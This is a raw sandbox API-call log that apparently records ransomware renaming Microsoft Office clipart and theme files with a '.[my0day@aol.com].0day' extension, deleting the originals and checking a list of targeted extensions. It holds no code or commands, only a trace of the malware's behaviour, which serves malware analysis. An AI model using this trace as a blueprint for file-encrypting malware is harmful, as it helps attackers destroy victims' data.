[0271.221] CloseHandle (hObject=0x318) returned 1 [0271.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 0x20 [0271.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.222] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.222] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.222] GetLastError () returned 0x0 [0271.222] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1a6c, lpOverlapped=0x0) returned 1 [0271.231] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1a70, lpOverlapped=0x0) returned 1 [0271.232] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.232] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.232] SetEndOfFile (hFile=0x390) returned 1 [0271.233] CloseHandle (hObject=0x390) returned 1 [0271.233] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.233] SetEndOfFile (hFile=0x318) returned 1 [0271.531] CloseHandle (hObject=0x318) returned 1 [0271.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.697] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid")) returned 1 [0271.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.728] lstrlenW (lpString=".doc") returned 4 [0271.728] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.728] lstrlenW (lpString=".docx") returned 5 [0271.728] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0271.728] lstrlenW (lpString=".pdf") returned 4 [0271.729] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.729] lstrlenW (lpString=".xls") returned 4 [0271.729] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.729] lstrlenW (lpString=".xlsx") returned 5 [0271.729] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0271.729] lstrlenW (lpString=".ppt") returned 4 [0271.729] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString=".zip") returned 4 [0271.730] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString=".rar") returned 4 [0271.730] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString=".bz2") returned 4 [0271.730] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.730] lstrlenW (lpString=".7z") returned 3 [0271.730] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString=".dbf") returned 4 [0271.730] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString=".1cd") returned 4 [0271.730] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString=".jpg") returned 4 [0271.730] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.730] lstrlenW (lpString=".doc") returned 4 [0271.730] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.730] lstrlenW (lpString=".docx") returned 5 [0271.730] lstrcmpiW (lpString1=".docx", lpString2="9.MID") returned -1 [0271.730] lstrlenW (lpString=".pdf") returned 4 [0271.730] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString=".xls") returned 4 [0271.730] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString=".xlsx") returned 5 [0271.730] lstrcmpiW (lpString1=".xlsx", lpString2="9.MID") returned -1 [0271.730] lstrlenW (lpString=".ppt") returned 4 [0271.730] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.731] lstrlenW (lpString=".zip") returned 4 [0271.731] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.731] lstrlenW (lpString=".rar") returned 4 [0271.731] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.731] lstrlenW (lpString=".bz2") returned 4 [0271.731] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.731] lstrlenW (lpString=".7z") returned 3 [0271.731] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.731] lstrlenW (lpString=".dbf") returned 4 [0271.731] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.731] lstrlenW (lpString=".1cd") returned 4 [0271.731] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 63 [0271.731] lstrlenW (lpString=".jpg") returned 4 [0271.731] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.731] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.731] lstrlenW (lpString="SPRNG_01.MID") returned 12 [0271.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.732] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6700) returned 1 [0271.732] CloseHandle (hObject=0x1fc) returned 1 [0271.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 0x20 [0271.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.732] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.732] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0271.733] GetLastError () returned 0x0 [0271.733] ReadFile (in: hFile=0x1fc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1a2c, lpOverlapped=0x0) returned 1 [0271.811] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1a30, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1a30, lpOverlapped=0x0) returned 1 [0271.812] ReadFile (in: hFile=0x1fc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.812] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.812] SetEndOfFile (hFile=0x2c4) returned 1 [0271.828] CloseHandle (hObject=0x2c4) returned 1 [0271.917] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.917] SetEndOfFile (hFile=0x1fc) returned 1 [0271.939] CloseHandle (hObject=0x1fc) returned 1 [0271.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 1 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.959] lstrlenW (lpString=".doc") returned 4 [0271.959] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.959] lstrlenW (lpString=".docx") returned 5 [0271.959] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.959] lstrlenW (lpString=".pdf") returned 4 [0271.959] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.959] lstrlenW (lpString=".xls") returned 4 [0271.959] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.959] lstrlenW (lpString=".xlsx") returned 5 [0271.959] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.959] lstrlenW (lpString=".ppt") returned 4 [0271.959] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.959] lstrlenW (lpString=".zip") returned 4 [0271.959] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.959] lstrlenW (lpString=".rar") returned 4 [0271.959] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.959] lstrlenW (lpString=".bz2") returned 4 [0271.959] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.959] lstrlenW (lpString=".7z") returned 3 [0271.959] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.959] lstrlenW (lpString=".dbf") returned 4 [0271.959] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.959] lstrlenW (lpString=".1cd") returned 4 [0271.959] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.960] lstrlenW (lpString=".jpg") returned 4 [0271.960] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.960] lstrlenW (lpString=".doc") returned 4 [0271.960] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.960] lstrlenW (lpString=".docx") returned 5 [0271.960] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.960] lstrlenW (lpString=".pdf") returned 4 [0271.960] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.960] lstrlenW (lpString=".xls") returned 4 [0271.960] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.960] lstrlenW (lpString=".xlsx") returned 5 [0271.960] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.960] lstrlenW (lpString=".ppt") returned 4 [0271.960] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.961] lstrlenW (lpString=".zip") returned 4 [0271.961] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.961] lstrlenW (lpString=".rar") returned 4 [0271.961] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.961] lstrlenW (lpString=".bz2") returned 4 [0271.961] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.961] lstrlenW (lpString=".7z") returned 3 [0271.961] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.961] lstrlenW (lpString=".dbf") returned 4 [0271.961] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.961] lstrlenW (lpString=".1cd") returned 4 [0271.961] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63 [0271.961] lstrlenW (lpString=".jpg") returned 4 [0271.961] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.961] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.961] lstrlenW (lpString="SWEST_01.MID") returned 12 [0271.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.962] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=8501) returned 1 [0271.962] CloseHandle (hObject=0x1fc) returned 1 [0271.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 0x20 [0271.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.962] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.962] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.962] GetLastError () returned 0x0 [0271.963] ReadFile (in: hFile=0x1fc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x2135, lpOverlapped=0x0) returned 1 [0271.994] WriteFile (in: hFile=0x398, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x2140, lpOverlapped=0x0) returned 1 [0271.996] ReadFile (in: hFile=0x1fc, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.996] WriteFile (in: hFile=0x398, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.996] SetEndOfFile (hFile=0x398) returned 1 [0271.996] CloseHandle (hObject=0x398) returned 1 [0271.996] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.996] SetEndOfFile (hFile=0x1fc) returned 1 [0271.999] CloseHandle (hObject=0x1fc) returned 1 [0271.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.016] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString=".doc") returned 4 [0272.048] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.048] lstrlenW (lpString=".docx") returned 5 [0272.048] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.048] lstrlenW (lpString=".pdf") returned 4 [0272.048] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.048] lstrlenW (lpString=".xls") returned 4 [0272.048] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.048] lstrlenW (lpString=".xlsx") returned 5 [0272.048] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.048] lstrlenW (lpString=".ppt") returned 4 [0272.048] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString=".zip") returned 4 [0272.048] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.048] lstrlenW (lpString=".rar") returned 4 [0272.048] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.048] lstrlenW (lpString=".bz2") returned 4 [0272.048] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.048] lstrlenW (lpString=".7z") returned 3 [0272.048] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString=".dbf") returned 4 [0272.048] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString=".1cd") returned 4 [0272.048] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.048] lstrlenW (lpString=".jpg") returned 4 [0272.048] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString=".doc") returned 4 [0272.049] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.049] lstrlenW (lpString=".docx") returned 5 [0272.049] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.049] lstrlenW (lpString=".pdf") returned 4 [0272.049] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.049] lstrlenW (lpString=".xls") returned 4 [0272.049] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.049] lstrlenW (lpString=".xlsx") returned 5 [0272.049] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.049] lstrlenW (lpString=".ppt") returned 4 [0272.049] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString=".zip") returned 4 [0272.049] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.049] lstrlenW (lpString=".rar") returned 4 [0272.049] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.049] lstrlenW (lpString=".bz2") returned 4 [0272.049] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.049] lstrlenW (lpString=".7z") returned 3 [0272.049] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString=".dbf") returned 4 [0272.049] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString=".1cd") returned 4 [0272.049] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0272.049] lstrlenW (lpString=".jpg") returned 4 [0272.049] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.050] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.050] lstrlenW (lpString="Angles.eftx") returned 11 [0272.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.073] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=27365) returned 1 [0272.073] CloseHandle (hObject=0x3a4) returned 1 [0272.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx")) returned 0x20 [0272.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Angles.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\angles.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 